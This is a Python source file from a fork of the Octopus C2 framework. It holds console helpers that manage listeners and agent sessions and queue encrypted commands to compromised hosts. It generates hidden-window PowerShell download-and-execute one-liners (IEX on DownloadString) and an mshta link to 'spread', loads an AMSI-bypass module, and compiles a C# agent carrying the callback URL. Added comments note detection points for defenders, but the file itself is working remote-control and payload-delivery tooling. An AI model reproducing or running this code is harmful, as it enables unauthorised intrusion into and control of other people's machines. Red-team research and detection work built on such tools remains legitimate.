forked from mhaskar/Octopus
functions.py
#!/usr/bin/python
from tabulate import tabulate
import threading
from flask import *
from termcolor import colored
import logging
import base64
import random
import string
from .encryption import *
from profile import *
import time
import os
# Module-level state shared by the console helpers below.
requests = []
counter = 1
listener_id = 0
# Session rows keyed by session id; rendered by list_sessions() and removed by delete().
connections_information = {}
# Listener rows; index 0 is the listener name and index 5 the URL path
# (see check_listener_name() and check_url()).
listeners_information = {}
# Most recent encrypted command queued per session (see send_command()).
commands = {}
# NOTE(review): `random` is the Mersenne Twister PRNG, not a cryptographically
# secure source, and the alphabet is limited to 26 uppercase letters, so this
# value is weak as secret key material. The standard-library `secrets` module is
# the usual source for keys. The key is generated once, when the module is imported.
key = "".join([random.choice(string.ascii_uppercase) for i in range(32)])
aes_encryption_key = base64.b64encode(bytearray(key, "UTF-8")).decode()
# Command names offered by completer() in the main console.
oct_commands = ["help", "exit", "interact", "list", "listeners", "listen_http", "listen_https", "delete", "generate_powershell", "generate_exe","generate_hta", "generate_duckyscript"]
# Command names offered by completer_interact(); "load" is listed twice.
oct_commands_interact = ["load", "help", "exit", "back", "clear", "download", "load", "report", "disable_amsi", "modules"]
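def check_url(url):
    """Return True when no registered listener already uses *url*.

    Each listener row keeps its URL path at index 5 (the "Path" column printed
    by list_listeners()).

    Args:
        url: URL path requested for a new listener.

    Returns:
        False if any existing listener has the same path, True otherwise
        (including when no listeners are registered).
    """
    # Compare against every listener: deciding on the first row alone would let
    # a path that collides with a later listener through.
    return all(row[5] != url for row in listeners_information.values())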
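def check_listener_name(listener_name):
    """Return True when *listener_name* is not used by any registered listener.

    Each listener row keeps its name at index 0 (the "Name" column printed by
    list_listeners()).

    Args:
        listener_name: name requested for a new listener.

    Returns:
        False if any existing listener has the same name, True otherwise
        (including when no listeners are registered).
    """
    # Compare against every listener: deciding on the first row alone would
    # accept a name that duplicates a later listener.
    return all(row[0] != listener_name for row in listeners_information.values())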
def list_sessions():
    """Print a table with one row per entry in connections_information."""
    headers = ["Session", "IP", "Hostname", "PID", "Username", "Domain", "Last ping", "OS"]
    rows = list(connections_information.values())
    print(("\n\n" + tabulate(rows, headers, "simple") + "\n\n"))
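def get_history():
    """Print the contents of ``.console_history.oct``.

    The path is relative to the current working directory. Any error raised by
    open() (for example when the file does not exist) propagates to the caller.
    """
    # The context manager closes the handle even if reading or printing fails.
    with open(".console_history.oct", "r") as history_file:
        print((history_file.read()))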
def list_listeners():
    """Print a table with one row per entry in listeners_information."""
    # Row layout as noted by the author: listener_name, ip, port, host,
    # interval, path, listener_name. The last printed header is "SSL".
    # TODO confirm what the final field actually stores.
    headers = ["Name", "IP", "Port", "Host", "Interval", "Path", "SSL"]
    rows = list(listeners_information.values())
    print(("\n\n" + tabulate(rows, headers, "simple") + "\n\n"))
def completer(text, state):
    """Return the *state*-th main-console command starting with *text*.

    Args:
        text: prefix typed so far.
        state: index of the requested match.

    Returns:
        The matching command name, or None once *state* is past the last match.
    """
    matches = [name for name in oct_commands if name.startswith(text)]
    return matches[state] if state < len(matches) else None
def completer_interact(text, state):
    """Return the *state*-th interact-mode command starting with *text*.

    Args:
        text: prefix typed so far.
        state: index of the requested match.

    Returns:
        The matching command name, or None once *state* is past the last match.
    """
    matches = [name for name in oct_commands_interact if name.startswith(text)]
    return matches[state] if state < len(matches) else None
def send_command(session, command):
    """Encrypt *command* and store it as the pending command for *session*.

    encrypt_command is not defined in this file; it presumably comes from the
    wildcard import of .encryption. Any command already pending for the session
    is overwritten.

    Args:
        session: key into the module-level ``commands`` dict.
        command: plaintext command string.
    """
    commands[session] = encrypt_command(aes_encryption_key, command)
    print("[+] Command sent , waiting for results")
def delete(hostname, sid):
    """Queue a kill command for a session, then drop its local records.

    Args:
        hostname: key used for the session in ``commands``.
        sid: key used for the session in ``connections_information``.

    Raises:
        KeyError: if *sid* is not present in ``connections_information``.
    """
    # $pid is PowerShell's automatic variable for the current process id.
    send_command(hostname, "kill $pid")
    # Presumably leaves time for the agent to fetch the command. TODO confirm.
    time.sleep(5)
    del commands[hostname]
    del connections_information[sid]
    print(("[+] Session %s killed !"%hostname))
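def list_modules():
    """Print every entry of the ``modules`` directory and register it for completion.

    Each entry name is added to ``oct_commands_interact`` so that
    completer_interact() offers it. The directory is resolved relative to the
    current working directory.
    """
    if not os.path.isdir("modules"):
        print((colored("[-] modules directory not Available")))
        return
    for module in os.listdir("modules"):
        # Register each name once; appending on every call would grow the
        # completion list with duplicates.
        if module not in oct_commands_interact:
            oct_commands_interact.append(module)
        print(module)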
def persistence():
    """Placeholder; not implemented (marked "to do" by the author)."""
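def load_module(session, module_name):
    """Read a file from ``modules/`` and queue its encrypted content for *session*.

    Args:
        session: key into the module-level ``commands`` dict.
        module_name: file name, appended to ``modules/`` without normalisation.
    """
    module = "modules/" + module_name
    if not os.path.isfile(module):
        print((colored("[-] Module is not exist !")))
        return
    # The context manager closes the handle; the original left it open.
    with open(module, "r") as module_file:
        module_content = module_file.read()
    # The module is encrypted before being queued.
    commands[session] = encrypt_command(aes_encryption_key, module_content)
    print((colored("[+] Module should be loaded !", "green")))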
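def disable_amsi(session):
    """Queue the encrypted content of ``modules/ASBBypass.ps1`` for *session*.

    For defenders: AMSI tampering of this kind is typically surfaced by
    PowerShell script block logging (event ID 4104) and by EDR telemetry.

    Args:
        session: key into the module-level ``commands`` dict.
    """
    amsi_module = "modules/ASBBypass.ps1"
    if not os.path.isfile(amsi_module):
        print((colored("[-] AMSI Module is not exist !")))
        return
    # The context manager closes the handle; the original left it open.
    with open(amsi_module, "r") as module_file:
        module_content = module_file.read()
    commands[session] = encrypt_command(aes_encryption_key, module_content)
    print((colored("AMSI disable module has been loaded !", "green")))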
def generate(hostname, path, proto, interval):
    """Print three PowerShell one-liners that fetch and run ``proto://hostname/path``.

    For defenders: all three variants share a hidden-window PowerShell launch
    and Net.WebClient.DownloadString feeding IEX / Invoke-Expression. Those
    strings are visible in process command-line auditing and in script block
    logging (event ID 4104).

    Args:
        hostname: host part of the printed URL.
        path: path part of the printed URL.
        proto: URL scheme.
        interval: accepted but not used by this function.
    """
    # Single random lowercase letter, used as the variable name in variant 3.
    var_name = random.choice(string.ascii_lowercase)
    rule = colored("#====================", "red")
    print(rule)
    print(("1) powershell -w hidden " + '"IEX (New-Object Net.WebClient).DownloadString(\'{2}://{0}/{1}\');"\n'.format(hostname, path, proto)))
    print(("2) powershell -w hidden " + '"Invoke-Expression (New-Object Net.WebClient).DownloadString(\'{2}://{0}/{1}\');"\n'.format(hostname, path, proto)))
    print(("3) powershell -w hidden " + '"${3} = (New-Object Net.WebClient).DownloadString(\'{2}://{0}/{1}\');Invoke-Expression ${3};"\n'.format(hostname, path, proto, var_name)))
    print("Hack your way in ;)")
    print(rule)
def generate_hta(host_ip, port,proto):
    """Print an ``mshta`` command line pointing at the listener's HTA URL.

    ``mshta_url`` is not defined in this file; it presumably comes from the
    wildcard import of ``profile``. TODO confirm.

    For defenders: mshta.exe launched with a remote URL argument is visible in
    process command-line auditing.

    Args:
        host_ip: host part of the printed URL.
        port: port part of the printed URL.
        proto: URL scheme.
    """
    rule = colored("#====================", "red")
    print(rule)
    hta_link = '{0}://{1}:{2}{3}'.format(proto,host_ip,port, mshta_url)
    print(("mshta " + hta_link))
    print("spread it and wait ;)")
    print(rule)
def generate_duckyscript(hostname, path, proto, output_path):
    """Placeholder; not implemented. The arguments are accepted and ignored."""
    # Author's outline of the intended steps:
    # Open the ducky template
    # Replace the URL
    # Export to file
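def generate_exe(hostname, path, proto, output_path):
    """Fill in the C# agent template and compile it with ``mono-csc``.

    The template ``agents/octopus.cs`` has its ``OCT_URL`` marker replaced by
    ``proto://hostname/path``. The result is written to ``tmp.cs`` in the
    current working directory and compiled to *output_path*.

    Args:
        hostname: host part of the embedded URL.
        path: path part of the embedded URL.
        proto: URL scheme.
        output_path: destination passed to the compiler's ``/out:`` option.
    """
    import shutil
    import subprocess

    if shutil.which("mono-csc") is None:
        print("[-] mono-csc is not installed !")
        return

    url = "{2}://{0}/{1}".format(hostname, path, proto)
    # Context managers close both handles; the original left the template open.
    with open("agents/octopus.cs") as template_file:
        template = template_file.read()
    with open("tmp.cs", "w") as source_file:
        source_file.write(template.replace("OCT_URL", url))

    # An argument list avoids shell parsing of output_path, which the original
    # interpolated into an os.system() command string.
    compile_argv = [
        "mono-csc",
        "/reference:includes/System.Management.Automation.dll",
        "tmp.cs",
        "/out:%s" % output_path,
    ]
    try:
        compiled = subprocess.run(compile_argv).returncode == 0
    finally:
        # Remove the intermediate source on failure too; the original deleted
        # it only after a successful build.
        os.remove("tmp.cs")

    if compiled:
        print((colored("[+] file compiled successfully !", "green")))
        print((colored("[+] binary file saved to {0}".format(output_path), "red")))
    else:
        print("[-] error while compiling !")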
def main_help_banner():
    """Print the help text for the main console."""
    help_lines = (
        "\n",
        "Available commands to use :\n",
        "Hint : the commands with * have arguments and you can see them by typing the command name only\n",
        "+++++++++",
        "help \t\t\t\tshow this help menu",
        "list \t\t\t\tlist all connected agents",
        "listeners \t\t\tlist all listeners",
        "* generate_powershell \t\tgenerate powershell oneliner",
        "* generate_hta \t\t\tgenerate HTA Link",
        "* generate_exe \t\t\tgenerate executable agent",
        "* listen_http \t\t\tto start a HTTP listener",
        "* listen_https \t\tto start a HTTPS listener",
        "interact {session} \t\tto interact with a session",
        "delete {session} \t\tto delete a session",
        "exit \t\t\t\texit current session",
        "\n",
    )
    for line in help_lines:
        print(line)
def http_help_banner():
    """Print the option descriptions for the HTTP listener command."""
    option_lines = (
        "\n##########",
        "Options info : \n",
        "BindIP \t\tIP address that will be used by the listener",
        "BindPort \t\tport you want to listen on",
        "Hostname \t\twill be used to request the payload from",
        "Interval \t\thow may seconds that agent will wait before check for commands",
        "URL \t\t\tpage name will hold the payload",
        "Listener_name \t\tlistener name to use\n",
    )
    for line in option_lines:
        print(line)
# certficate_path key_path
def https_help_banner():
    """Print the option descriptions for the HTTPS listener command."""
    option_lines = (
        "\n##########",
        "Options info : \n",
        "BindIP \t\tIP that will be used by the listener",
        "BindPort \t\tport you want to listen on",
        "Hostname \t\twill be used to request the payload from",
        "Interval \t\thow may seconds that agent will wait before check for commands",
        "URL \t\t\tpage name will hold the payload",
        "certficate_path \t the full path for the ssl certficate",
        "key_path \t\t the full path for the ssl certficate private key\n",
        "Listener_name \t\tlistener name to use",
    )
    for line in option_lines:
        print(line)
def interact_help():
    """Print the help text for interact mode."""
    help_lines = (
        "\n",
        "Available commands to use :\n",
        "Hint : if you want to execute system command just type it and wait for the results\n",
        "+++++++++",
        "help \t\t\t\tshow this help menu",
        "exit/back \t\t\texit current session and back to the main screen",
        "clear \t\t\t\tclear the screen output",
        "download \t\t\tdownload file from the target machine",
        "load \t\t\t\tload powershell module to the target machine",
        "disable_amsi \t\t\tdisable AMSI on the target machine",
        "report \t\t\t\tget situation report from the target",
        "\n",
    )
    for line in help_lines:
        print(line)
def banner():
    """Print the coloured ASCII-art start-up banner."""
    # ANSI escape sequences used by the template below.
    # \033[94m
    version = '\33[43m V1.0 Beta \033[0m'  # assigned but not used
    yellow = '\33[33m'
    green = '\033[92m'
    red = '\033[91m'
    reset = '\033[0m'
    # Placeholders: {0} red, {1} reset, {2} green, {3} yellow.
    art = r'''
{0}
/$$$$$$ /$$
/$$__ $$ | $$
| $$ \ $$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$
| $$ | $$ /$$_____/|_ $$_/ /$$__ $$ /$$__ $$| $$ | $$ /$$_____/
| $$ | $$| $$ | $$ | $$ \ $$| $$ \ $$| $$ | $$| $$$$$$
| $$ | $$| $$ | $$ /$$| $$ | $$| $$ | $$| $$ | $$ \____ $$
| $$$$$$/| $$$$$$$ | $$$$/| $$$$$$/| $$$$$$$/| $$$$$$/ /$$$$$$$/
\______/ \_______/ \___/ \______/ | $$____/ \______/ |_______/
| $$
| $$
|__/
{1}
{3}V1.0 BETA !{1}
{2} Octopus C2 | Control your shells {1}
'''
    print((art.format(red, reset, green, yellow)))